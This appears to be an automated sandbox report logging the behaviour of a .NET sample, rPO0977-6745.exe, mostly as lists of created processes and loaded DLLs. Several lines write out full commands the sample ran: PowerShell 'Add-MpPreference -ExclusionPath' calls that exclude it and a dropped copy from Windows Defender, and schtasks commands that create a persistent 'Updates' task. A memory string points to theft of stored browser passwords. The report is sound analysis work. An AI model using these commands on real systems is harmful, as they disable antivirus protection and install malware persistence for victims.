Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3644:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
Source: C:\Users\user\Desktop\rPO0977-6745.exe File created: C:\Users\user\AppData\Local\Temp\tmp44AD.tmp Jump to behavior
Source: rPO0977-6745.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rPO0977-6745.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\rPO0977-6745.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000317B000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3697372033.0000000003FAF000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000316D000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, rPO0977-6745.exe, 0000000A.00000002.3693243826.000000000315D000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3696801560.0000000003821000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000029CC000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.00000000029DC000.00000004.00000800.00020000.00000000.sdmp, EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: rPO0977-6745.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\rPO0977-6745.exe File read: C:\Users\user\Desktop\rPO0977-6745.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe" Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe" Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp" Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe" Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Process created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Process created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe" Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Section loaded: cryptbase.dll
